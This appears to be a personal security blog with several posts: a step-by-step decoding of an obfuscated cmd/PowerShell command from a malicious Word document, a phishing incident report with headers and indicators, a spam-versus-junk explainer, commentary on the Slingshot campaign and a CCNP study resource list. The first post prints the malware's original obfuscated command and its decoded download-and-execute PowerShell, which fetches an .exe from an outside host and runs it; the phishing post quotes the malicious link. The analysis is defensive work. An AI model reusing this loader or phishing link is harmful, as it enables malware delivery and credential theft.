Wednesday, August 22, 2018

Fun Little Decoding of Obfuscated CMD Line to Run PowerShell Cmd

This came from a malicious Word doc titled John_Townsend_Request.doc.
SHA256 e1a68aaba205c7b7336d4f19627f54f891f5bc504372e575941d38cbcab42546

Original Command Line Arguments:

Cmd /v^:^O ^ ^ /r s^e^T ^ ^ UMn^l^=p^ow)r^sh)l^l^ -)^ ^:^ABoA^#4Ad^Q^A9^A^#4^A`Q^B^3AC^0^A^bwB^iA^#oA^`QB^j^A^gQA^IABO^A#U^A^dA
Au^AFcA^`^Q^Bi^A(^MAb^A^BpA#^U^Ab^$^B0ADsA^:^A^B^p^A#^$^A.A^A9^ACcA^a^AB0
^Ag^Q^AcAA6AC8^A^LwB^j^A^#8A^b$^Bn^A#n^A)$BlA^gIAL^$^B^j^A#^8^A^b^Q^Av^A^g
QAc^w^B0^AC^8A^aQBu^A#^QA^`Q^B4AC4^Ac^A^BoA^g^A^APw^B^s^AD0AcwBvA^#$A^
bwA1AC4Ad^ABrA#4^A:^w^AuA^FM^Ac^A^B^sA^#nAdAA^o^ACc^AQ^A^A+^ACnAO^w^A
n^A#nAd^A^B^F^ACA^APQ^A$^ACcA^\^w^A^4A^D(^A^:^wA7AC^QA^S^$^B^gAgU^A^P^Q
An^A#UAb^$B2A^D^oAcA^B,^A#I^Ab^A^Bp^A^#MAKw^A^+AF^w^A:wArAC^Q^A^aQ^B^0
^A(^UAKwA+AC4A^`Q^B^4A#U^A^:w^A^7A#Y^Abw^B^yA#^UAY^QBjA#$^AK^A^AnA^FQ
^AR^A^B^6ACA^A^a^QBuAC^A^A^:^A^Bp^A#$A.AApAgs^AdAByAgn^A)^w^An^A#^$^Ab$
^B^,^AC^4^AR^ABv^AgcAb^$^B^sA^#8A^YQBn^A(^Y^AaQ^Bs^A^#UA^K^AAn^A^FQ^AR^
A^B^6^AC^wA^I^AAnA(^oAR^wB^,ACn^AO^w^B^:^A#4Ad^$^Bv^A^#s^A`Q^A^tA(nAdAB^l
^A#^0A^IAAn^A(^oAR^w^B^,^AD^sAY$^By^A#U^AY^Q^Br^A^D^sA^f^QB^jA#(Ad^ABjA^#$^A)^w^B^9A^g0A^I^AA$AC^A^A^I^A^A$^ACA^AI^AA^$ACAA^I^AA^$^ACA
A^I^AA$^ACA^A^IAA$AA^=^=& sE^t ^ ^ Z^s^Lm=^!^UMn^l^:n=^k!& s^E^t ^ Rv^y=^!^Z^s^Lm:^g^=H^!& s^E^T ch^a^m=!Rv^y^:\=N^!& sE^T ^ ^dm=^!ch^a^m^:^$=^g^!&&S^e^T ^ ^ ^M^m^xs=^!^d^m:)=^e^!&&S^eT ^ ^ ^ H^J^o=^!^M^m^xs^:1=^z!& se^t ^ ^ ^q^zy=^!^H^J^o^::^=^J!&&s^et ^ ^x^e5C=!^q^zy:`^=^Z^!&& s^e^T ^ ^ ^ ^K^6^8=^!^x^e^5C^:^,^=^1!& se^t ^ ^ ^68V=!^K^6^8:^+^=n^!& se^T ^ q^F=!^6^8V^:(^=^E^!&& s^e^t ^ ^ ^8lW^m=^!q^F^:^.^=^W^!& S^ET E^3=^!^8^l^W^m:^#^=G^!&&ca^L^L %E^3%

Step 1. Remove Filler Noise character "^"


Cmd /v:O   /r seT   UMnl=pow)rsh)ll -) :ABoA#4AdQA9A#4A`QB3AC0AbwBiA#oA`QBjAgQAIABOA#UAdAAuAFcA`QBiA(MAbABp
A#UAb$B0ADsA:ABpA#$A.AA9ACcAaAB0AgQAcAA6AC8ALwBjA#8Ab$BnA#nA)$BlAgIAL
$BjA#8AbQAvAgQAcwB0AC8AaQBuA#QA`QB4AC4AcABoAgAAPwBsAD0AcwBvA#$AbwA
1AC4AdABrA#4A:wAuAFMAcABsA#nAdAAoACcAQAA+ACnAOwAnA#nAdABFACAAPQA$
ACcA\wA4AD(A:wA7ACQAS$BgAgUAPQAnA#UAb$B2ADoAcAB,A#IAbABpA#MAKwA+A
FwA:wArACQAaQB0A(UAKwA+AC4A`QB4A#UA:wA7A#YAbwByA#UAYQBjA#$AKAAnAF
QARAB6ACAAaQBuACAA:ABpA#$A.AApAgsAdAByAgnA)wAnA#$Ab$B,AC4ARABvAgcA
b$BsA#8AYQBnA(YAaQBsA#UAKAAnAFQARAB6ACwAIAAnA(oARwB,ACnAOwB:A#4Ad
$BvA#sA`QAtA(nAdABlA#0AIAAnA(oARwB,ADsAY$ByA#UAYQBrADsAfQBjA#(AdABjA#$A)wB9Ag0AIAA$ACAAIAA$ACAAIAA$ACAAIAA$ACAAIAA$ACAAIAA$AA==
& sEt   ZsLm=!UMnl:n=k!& sEt  Rvy=!ZsLm:g=H!& sET cham=!Rvy:\=N!& sET  dm=!cham:$=g!&&SeT   Mmxs=!dm:)=e!&&SeT    HJo=!Mmxs:1=z!& set   qzy=!HJo::=J!&&set  xe5C=!qzy:`=Z!&& seT    K68=!xe5C:,=1!& set   68V=!K68:+=n!& seT  qF=!68V:(=E!&& set   8lWm=!qF:.=W!& SET E3=!8lWm:#=G!&&caLL %E3%






Step 2. Capture CMD line as it runs in Sandbox to get character substitutes


# = G
( and ) = E
` = Z
$ = g
n = k

powershell -e JABoAG4AdQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEM...

Step 3. Base64 Decode


$�h�n�u�=�n�e�w�-�o�b�j�e�c�t� �N�e�t�.�W�e�b�C�l�i�e�n�t�;�$�i�h�X�=�'�h�t�t�p�:�/�/�c�o�n�d�i�z�e�r�.�c�o�m�/�t�s�t�/�i�n�d�e�x�.�p�h�p�?�l�=�s�o�h�o�3�.�t�k�n�'�.�S�p�l�i�t�(�'
�@�'�)�;�$�i�t�E� �=� �'�7�8�1�'�;�$�J�G�u�=�$�e�n�v�:�p�u�b�l�i�c�+�'�\�'�+�$�i�t
�E�+�'�.�e�x�e�'�;�f�o�r�e�a�c�h�(�$�T�D�z� �i�n� �$�i�h�X�)�{�t�r�y�{�$�h�n�u�.�D�o�w�n�l�o�a�d�F�i�l�e�(�$
�T�D�z�,� �$�J�G�u�)�;�I�n�v�o�k�e�-�I�t�e�m� �$�J�G�u�;�b�r�e�a�k�;�}�c�a�t�c�h�{�}�}� � � � � � � � � � � � � � � � � �

Step 4. Remove spacer character "�"


(Decoded: $hnu=new-object Net.WebClient;$ihX='hxxp://condizer[.]com/tst/index.php?l=soho3.tkn'.Split('@');$itE = '781';$JGu=$env:public+'\'+$itE+'.exe';foreach($TDz in $ihX){try{$hnu.DownloadFile($TDz, $JGu);Invoke-Item $JGu;break;}catch{}} )
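The four steps above, replayed in code as an added example (not from the original post): carets stripped, the set/substitution chain applied in the order cmd.exe applies it, the -e payload base64-decoded as UTF-16LE. The real command is wrapped across lines above, so this runs on a constructed command line in the same style whose payload decodes to the harmless "Get-Date"; it also enforces a caveat the hand decode glosses over, that cmd's !var:old=new! match is case-insensitive, which is why the chain's order matters.

```python
import base64
import re

# Constructed command line in the same style as the one in this post (not the
# real sample): carets as filler, a base64 payload with characters swapped, and
# a chain of delayed-expansion substitutions that repairs it before "call".
# The swap pairs come from the post's step 2 table (g/H, )/e, (/E, #/G); the
# payload decodes to the harmless "Get-Date".
SAMPLE = (
    "Cmd /v^:^O ^ ^ /r s^e^T ^ ^ UMn^l^=p^ow)r^sh)l^l^ -)^ Rw^Bl^AgQ^ALQ^B(A^#(AdAB^lAA==& "
    "sE^t ^ ^ Zs^Lm=^!^UMn^l^:g=H^!& s^E^t ^ Rv^y=^!^Zs^Lm:)=^e!&&"
    "s^eT ^ ch^a^m=!Rv^y^:(^=E^!& S^ET E^3=^!ch^a^m:^#^=G^!&&ca^L^L %E^3%"
)

SET_RE = re.compile(r"\bset\s+(\w+)=(.*)$", re.IGNORECASE)
SUBST_RE = re.compile(r"^!(\w+):(.*?)=(.*)!$")
CALL_RE = re.compile(r"\bcall\s+%(\w+)%", re.IGNORECASE)
ENC_RE = re.compile(r"-e\w*\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def strip_carets(cmdline):
    """Step 1: ^ only escapes the next character, so dropping every caret gives
    the line as cmd.exe parses it (the sample never uses ^^ for a literal caret)."""
    return cmdline.replace("^", "")


def cmd_replace(value, old, new):
    """One !var:old=new! step. cmd.exe matches `old` case-insensitively, which is
    why the chain has to be replayed in its original order: here g=H runs before
    #=G, otherwise the freshly restored G would be turned into H as well."""
    return re.sub(re.escape(old), lambda _m: new, value, flags=re.IGNORECASE)


def deobfuscate(cmdline):
    """Replay the set/substitution chain; return (called command, decoded script)."""
    env = {}
    final_cmd = None
    for stmt in re.split(r"&&?", strip_carets(cmdline)):
        stmt = stmt.strip()
        m = SET_RE.search(stmt)
        if m:
            name, value = m.group(1).lower(), m.group(2)
            s = SUBST_RE.match(value)
            if s:  # value is a !var:old=new! substitution of an earlier variable
                value = cmd_replace(env[s.group(1).lower()], s.group(2), s.group(3))
            env[name] = value
            continue
        m = CALL_RE.search(stmt)
        if m:
            final_cmd = env[m.group(1).lower()]
    # Steps 3 and 4: -e takes base64 of UTF-16LE text; the "spacer" characters
    # removed by hand in the post are the zero high bytes of that encoding.
    enc = ENC_RE.search(final_cmd or "")
    script = base64.b64decode(enc.group(1)).decode("utf-16-le") if enc else None
    return final_cmd, script


if __name__ == "__main__":
    cmd, script = deobfuscate(SAMPLE)
    print(cmd)
    print(script)
```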

Tuesday, May 15, 2018

Sharepoint Email Phishing









Summary:
At about 12:33 PM Eastern an e-mail was delivered to multiple mailboxes within the company. It purported to be from an internal employee; the address was legitimate and was not obfuscated to hide a different originating address. There were at least two variations of the email. Both contained a link to a malicious domain (sued[.]co[.]ke); the link was hidden behind the alternate text “DownloadAttachments”. Clicking the link would prompt some users to enter their email address and password.

The URL and parent domain were immediately added to the company's Umbrella solution to prevent any further DNS resolution of the domain when users click on the link.

The IP addresses that the link resolved to were added to the firewalls at all sites to be shunned.
It appears that approximately 35 – 40 users clicked on the link and entered credentials. All users that have contacted IT Support or HelpDesk have had their domain password changed.

Investigation indicates this email came from an external IP address and was not necessarily sent from an internal device. The originating IP address in the email header is unknown to threat intel resources. The address is located in Illinois, in a VPN block that belongs to LogicWeb. There are no domains hosted at this IP.
The email body was created in Gmail, as indicated by the tags around the source, and the alternate text for the Sharepoint logo appears to be in Spanish: img alt="Resultado de imagen para sharepoint logo"


Known malicious sample download
SHA256 - f9e8e6107cb0ff5ad3b891ad99580aac57eaa8f519c8ba9baa9c779d4b6f68f8
File Type: HTML
Magic: HTML document text
SSDeep: 768:DHxjTggziQuAr7SpF9G9h919/ozio/InD:6GiQuAr7SpEozio/ID
File Size: 28.77 KB
Main detection: Trojan.HTML.Phishing
Domain Info
Domain Name:  sued.co.ke

IP Addresses Resolved to:
·       208.91.199.87
·       162.213.252.60 <-- All our traffic was centered around this IP

Screenshot of the email:


E-Mail Message Sample 1 Header and Source

Received: from BN7xxxxxxx113.xxxxxxx.prod.outlook.com (2603:10b6:4:ae::39) by
DMxxxxxB4105.xxxxxx.prod.outlook.com with HTTPS via
DM5xxxx0.NAMxxx07.PROD.OUTLOOK.COM; Mon, 14 May 2018 16:33:27 +0000
Authentication-Results: domain.com; dkim=none (message not signed)
header.d=none;domain.com; dmarc=none action=none
header.from=<company name>;
.
.
.
From: "Dennis B. Manning" <dennis.manning@bioglobal.co>
To: "Dennis B. Manning" <dennis.manning@bioglobal.co>
Subject: INVOICE
Thread-Topic: INVOICE
X-MS-Exchange-Organization-MessageDirectionality: Originating
X-MS-Exchange-Organization-AuthSource: BN7PRxxxxmprd04.prod.outlook.com
X-MS-Exchange-Organization-AuthAs: Internal
X-MS-Exchange-Organization-AuthMechanism: 04
X-Originating-IP: [173.239.199.110]
X-MS-Exchange-Organization-Network-Message-Id: 61d1100c-e50e-4798-2591-08d5b9b868a9
X-MS-PublicTrafficType: Email
X-Microsoft-Exchange-Diagnostics: 1;BN7PR04MB4307;35:hYQ8ykDJvNTkVuzaeSsSAZpmmFrC1R5Ulntep7gMcSI/UhbDiIALU6UQOhBeYZY2UCllhTuswM3SWrmuDe6GIw==
X-MS-Exchange-Organization-ExpirationStartTime: 14 May 2018 16:33:22.6051
(UTC)
X-MS-Exchange-Organization-ExpirationStartTimeReason: Original Submit
X-MS-Exchange-Organization-ExpirationInterval: 2:00:00:00.0000000
X-MS-Exchange-Organization-ExpirationIntervalReason: Original Submit
X-Microsoft-Antispam: UriScan:;BCL:0;PCL:0;

E-Mail Message Sample 2 Header and Source

Received: from BN7xxxx04.xxxxxxx4.prod.outlook.com (2603:10b6:4:ae::44) by
DxxxxxB4105.namprd04.prod.outlook.com with HTTPS via
DM5xxxx0115.NAxxx07.PROD.OUTLOOK.COM; Mon, 14 May 2018 16:34:11 +0000
Received: from BNxxxxxB4050.xxxxxx.prod.outlook.com (20.176.18.18) by
BN7Pxxxx04.xxxx4.prod.outlook.com (20.xx6.xx.155) with Microsoft SMTP
Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id
15.20.755.16; Mon, 14 May 2018 16:34:09 +0000
Authentication-Results: teijin.co.jp; dkim=none (message not signed)
header.d=none;teijin.co.jp; dmarc=none action=none
header.from=<Company name>;
.
.
.

From: "Dennis B. Manning" <dennis.manning@bioglobal.co>
To: "Dennis B. Manning" <dennis.manning@bioglobal.co>

Subject: INVOICE
Thread-Topic: INVOICE
Date: Mon, 14 May 2018 16:34:04 +0000
X-Originating-IP: [173.239.199.110]


E-Mail Body Source Code (interesting sections)

<a href="http://sued.co.ke/sharepoint/sharepoint/" rel="noopener noreferrer" id="LPlnk981628" class="gmail-m_-5254795068973409301gmail-m_3735968270271966208gmail-m_1095737800804209384m_-8407371155946476852gmail-m_-8252052683460989792gmail-m_6238816748888944654gmail-m_741264181270171108gmail-OWAAutoLink gmail-m_-5254795068973409301gmail-m_3735968270271966208gmail-m_1095737800804209384m_-8407371155946476852gmail-m_-8252052683460989792gmail-m_6238816748888944654gmail-OWAAutoLink gmail-m_-5254795068973409301gmail-m_3735968270271966208gmail-m_1095737800804209384m_-8407371155946476852gmail-OWAAutoLink OWAAutoLink" target="_blank" style="color:rgb(17,85,204)" previewremoved="true"><font size="2" color="#1155CC"><span id="gmail-m_-5254795068973409301gmail-m_3735968270271966208gmail-m_1095737800804209384m_-8407371155946476852gmail-m_-8252052683460989792gmail-m_6238816748888944654gmail-m_741264181270171108gmail-m_2205792334074373374gmail-LPlnk375107" style="font-size:16px; background-color:transparent">DownloadAttachments</span></font></a>
.
.
.
<span id="gmail-m_-5254795068973409301gmail-m_3735968270271966208gmail-m_1095737800804209384m_-8407371155946476852gmail-m_-8252052683460989792gmail-m_6238816748888944654gmail-m_741264181270171108gmail-m_2205792334074373374gmail-ms-rterangepaste-start" style="font-size:16px; background-color:transparent"></span></font><img alt="Resultado de imagen para sharepoint logo" width="152" height="48" src="https://mvpcluster.com/wp-content/uploads/2016/03/0001-SP-2013-Logo.png"><font size="2" color="#1155CC"><span id="gmail-m_-5254795068973409301gmail-m_3735968270271966208gmail-m_1095737800804209384m_-8407371155946476852gmail-m_-8252052683460989792gmail-m_6238816748888944654gmail-m_741264181270171108gmail-m_2205792334074373374gmail-ms-rterangepaste-end" style="font-size:16px; background-color:transparent"></span>



First Query seen in SC
May 14 09:41:14 nnm: 10.x.x.101:53|10.x.x.111:53|17|7024|DNS Client Queries|PVS has observed this host perform a DNS lookup. The most recent DNS query performed was for: |sued.co.ke to the server at 10.x.x.111|

SecurityCenter Events
·       530 Web_Request events tracked by SC. Almost all were GET requests for .css files. The ones below were unique in the list of GET/POST events:

HTTP request detection|The following GET/POST request was observed:|DIP: 162.213.252.60:80 Type: POST;URI: /?wc-ajax=get_refreshed_fragments;Referer: http://sued.co.ke/sharepoint/sharepoint/Office%20365_files/SuiteServiceProxy.htm

Random Variations (showed up 4 or 5 times out of 140 events):
GET;URI: /s/opensans/v15/mem5YaGs126MiZpBA-UN_r8OXOhv.woff;
GET;URI: /sharepoint/sharepoint/Office%20365_files/shellwofficons_f991c945.woff;
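Triage of the SecurityCenter/PVS events quoted above, as an added Python example (not from the original write-up): it parses the pipe-delimited nnm lines, flags hosts that looked up the phishing domain or sent requests to the shunned IPs, and separates POSTs from the asset GETs. The event lines are constructed in the layout of the two quoted events; the 10.0.0.x hosts, client ports and the HTTP plugin id are made up.

```python
import re

# Constructed SecurityCenter/PVS (nnm) event lines laid out like the two
# events quoted above; the 10.0.0.x hosts, ports and the HTTP plugin id are
# made up, the domain and IPs are the ones from this write-up.
EVENTS = [
    "May 14 09:41:14 nnm: 10.0.0.101:53|10.0.0.111:53|17|7024|DNS Client Queries|"
    "PVS has observed this host perform a DNS lookup. The most recent DNS query "
    "performed was for: |sued.co.ke to the server at 10.0.0.111|",
    "May 14 09:41:20 nnm: 10.0.0.102:53|10.0.0.111:53|17|7024|DNS Client Queries|"
    "PVS has observed this host perform a DNS lookup. The most recent DNS query "
    "performed was for: |www.example.com to the server at 10.0.0.111|",
    "May 14 09:41:30 nnm: 10.0.0.101:49512|162.213.252.60:80|6|0|HTTP request detection|"
    "The following GET/POST request was observed:|DIP: 162.213.252.60:80 Type: POST;"
    "URI: /?wc-ajax=get_refreshed_fragments;Referer: http://sued.co.ke/sharepoint/"
    "sharepoint/Office%20365_files/SuiteServiceProxy.htm|",
    "May 14 09:41:31 nnm: 10.0.0.101:49513|162.213.252.60:80|6|0|HTTP request detection|"
    "The following GET/POST request was observed:|DIP: 162.213.252.60:80 Type: GET;"
    "URI: /sharepoint/sharepoint/Office%20365_files/shellwofficons_f991c945.woff|",
]

BAD_DOMAINS = {"sued.co.ke"}
BAD_IPS = {"208.91.199.87", "162.213.252.60"}

# src:port|dst:port|proto|plugin id|plugin name|text...
LINE_RE = re.compile(
    r"nnm: (?P<src>[\d.]+):\d+\|(?P<dst>[\d.]+):\d+\|\d+\|\d+\|(?P<plugin>[^|]+)\|(?P<rest>.*)"
)
QUERY_RE = re.compile(r"\|([^ |]+) to the server at ")
TYPE_RE = re.compile(r"Type: (\w+);")


def triage(lines):
    """Return {internal host: [(kind, indicator), ...]} for every event that
    touched the watchlist; hosts that never did are left out."""
    hits = {}
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        src, dst, plugin, rest = m.group("src", "dst", "plugin", "rest")
        if plugin == "DNS Client Queries":
            q = QUERY_RE.search(rest)
            if q and q.group(1).lower() in BAD_DOMAINS:
                hits.setdefault(src, []).append(("dns", q.group(1).lower()))
        elif plugin == "HTTP request detection" and dst in BAD_IPS:
            t = TYPE_RE.search(rest)
            kind = t.group(1).lower() if t else "http"
            hits.setdefault(src, []).append((kind, dst))
    return hits


def posting_hosts(hits):
    """Hosts that sent a POST to a watchlisted IP. A DNS lookup or a GET for the
    .css/.woff assets only shows the page was opened; a POST is the first thing
    to follow up when deciding whose credentials to reset."""
    return sorted(h for h, items in hits.items() if any(k == "post" for k, _ in items))
```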









Spam vs. Junk

...And what to do about it.


There is a difference between emails: there is spam and there is junk. Do you know what the difference is? Junk is anything that comes from a legitimate source, usually in the form of a marketing email. Spam comes from a less-than-ethical source and can take any form, usually with the intent of getting a user to click on a link. The link can then lead to a variety of sites with varying purposes. If the email is a 'phishing' email, then the intent is to get you to provide credentials or other sensitive information that can then be utilized by the threat actor to perform some nefarious action.

The other type of link provides you with a piece of malicious software, usually without your consent or knowledge. This can allow even more serious activity to take place on your system and with your data. In the rare case, the link will provide both a place to enter credentials and a download to your system. In all three cases, company data and personal data are placed at great risk.
Junk mail, on the other hand, just fills your mailbox and costs you the time it takes to delete it. Not nefarious, just a pain.

Training users to know the difference and how to respond to it can save a lot of work for the security analyst. 

For instance, Outlook has a Junk E-mail Options setting. This can be a great tool for end users, but they must be trained on what it means for them and their daily mail habits: more than just junk will get caught by it, and new addresses need to be constantly added to the Safe Senders list.




Wednesday, March 21, 2018

Bring Out Your Dead, Bring Out Your Dead!

Well, as the title says, I am bringing out my dead. My dead blog, that is. I have been away for a couple of years and much has changed. I have progressed quite far in my security field and have many new skills. I am hoping to share some of what I learn with you in what I hope will be an entertaining and educational way.
I am progressing into malware analysis and will be sharing the results of that, as far as samples I analyze and things I discover.
Also, I have something to say about recent events. To start with: the 'Slingshot' campaign, as discovered and named by Kaspersky. Earlier this month Kaspersky published a report detailing activity targeting many Middle East countries and some in Africa. It explained that the intrusions were being carried out by hacking into Mikrotik routers. The main piece of malware being used by the group has been dubbed Slingshot, based on strings found by researchers.
Cyberscoop has now claimed to have learned that Slingshot is actually an operation of the US military's Joint Special Operations Command, which is a component of Special Operations, and is aimed at members of terrorist organizations such as ISIS and al-Qaeda. The source that gave the information to Cyberscoop has expressed concern that the exposure of the campaign may result in both the loss of a valuable surveillance program and the endangerment of the lives of US soldiers.
Most likely the Slingshot infrastructure has been abandoned following the disclosure.
Who knows what the repercussions from this will be; only time will tell.

Saturday, May 2, 2015

List of Resources for CCNP Security Studies



(working on formatting)

Purpose

This document is one that seems to be needed currently. There is so much out there that I am going to try to put together a list of all the resources currently available for pursuing the CCNP Security certification. Some of these resources are free and some are paid. Some are not yet available. Please comment and feel free to make any suggestions. I do not intend for this to be a static or solo document. Any good resource for study is welcome.
Starting with the required exams and prerequisites.

Prerequisites
CCNA Security or valid CCSP or any CCIE certification can act as a prerequisite.

Required Exam(s)

Cisco Recommended Training
Implementing Cisco Secure Access Solutions (SISAS)
Implementing Cisco Threat Control Solutions (SITCS)
Implementing Cisco Edge Network Security Solutions (SENSS)
Implementing Cisco Secure Mobility Solutions (SIMOS)



(Paid resource) Videos available on Cisco Learning Network Premium Library
These are the video series that I have located in the Cisco Learning Network Premium Library. I marked which exam they relate to. Hopefully we will get a full play list put together to make it easier to locate for each exam.

==========================================================================================================================================
(Free resource) IPExpert videos available on YouTube
These are free videos that are produced by IPExpert and are available on YouTube
Follow this link to the playlist:
The videos include the following:
  CCNP Security :: SISAS - AAA for Device Administration  23:16
  CCNP Security SITCS Cisco ESA Overview  4:25
  CCNP Security :: SIMOS - IKEv2 Site to Site ASA  20:35
  CCNP Security :: SIMOS - Cryptography Basics  35:34
  CCNP Security and CCIE Security Training Video :: IOS IPS (CLI)  45:31
  CCNP Security :: SENSS - Management Access Configuration  21:19
  CCNP Security :: SISAS - TrustSec Overview  7:49
  CCNP Security :: SENSS - Cisco Prime  12:48
  CCNP VOD Sample :: SECURE :: Traffic Planes  11:48
  CCNP Security Training Video :: VPN High Availability - Failover :: VPN  36:51
  CCNP Security :: IKEv1 IPSec Site-to-Site Digital Certificates - Exam 642-648 - VPN  41:19
  CCNP Security :: ASA Certificate Maps - Exam 642-648 - VPN
==========================================================================================================================================
(Paid resource) Cisco Press Official Study Guides
Not released. The publication dates for these books have been moving targets so far. Everyone is anxiously awaiting the release.
CCNP Security SISAS 300-208 Official Cert Guide <-- UPDATE Kindle version is available
Hardcover - May 27, 2015  
Available for pre-order only
CCNP Security SENSS 300-206 Official Cert Guide (Certification Guide) 
Hardcover – August 9, 2015 Available for pre-order only
CCNP Security SIMOS 300-209 Official Cert Guide (Certification Guide)  
Hardcover – September 21, 2015 Available for pre-order only
==========================================================================================================================================
(Paid resource) CBT Nuggets Series
A good hint with CBT Nuggets is to sign up for the free week and download all the free lab resources for the videos. They contain some very useful information.
Cisco CCNP Security 300-208 SISAS
November 2014 with Keith Barker
Intermediate 5 Hrs 32 Mins
Cisco CCNP Security 300-209 SIMOS
July 2014 with Keith Barker
Intermediate 9 Hrs 14 Mins
Cisco CCNP Security VPN v2.0
October 2012 with Keith Barker
Intermediate 10 Hrs 33 Mins
Cisco CCNP Security Firewall
October 2012 with Keith Barker
Intermediate 13 Hrs 23 Mins
Cisco CCNA Security 640-554
September 2012 with Keith Barker
Intermediate 11 Hrs 27 Mins
Cisco CCNP Security 300-206 SENSS
June 2014 with Keith Barker
Advanced 10 Hrs 22 Mins
==========================================================================================================================================
(Partner status required) Cisco Partner Education Connection

These videos are all produced by Stormwind. When first posted they could be downloaded, but Stormwind complained and said that Cisco could not allow them to be downloaded which is too bad because they were formatted for tablets quite nicely. They still say download on the site, but that is no longer true.
SIMOS v1.0: Implementing Cisco Secure Mobility Solutions - Video  Duration 11 Hours 25 Minutes
SENSS v1.0: Implementing Cisco Edge Network Security Solutions - Video Duration 12 Hours 6 Minutes
SITCS v1.0: Implementing Cisco Threat Control Solutions - Video Duration 12 Hours 35 Minutes
SISAS v1.0: Implementing Cisco Secure Access Solutions - Video Duration 12 Hours 58 Minutes
==========================================================================================================================================


More to come.....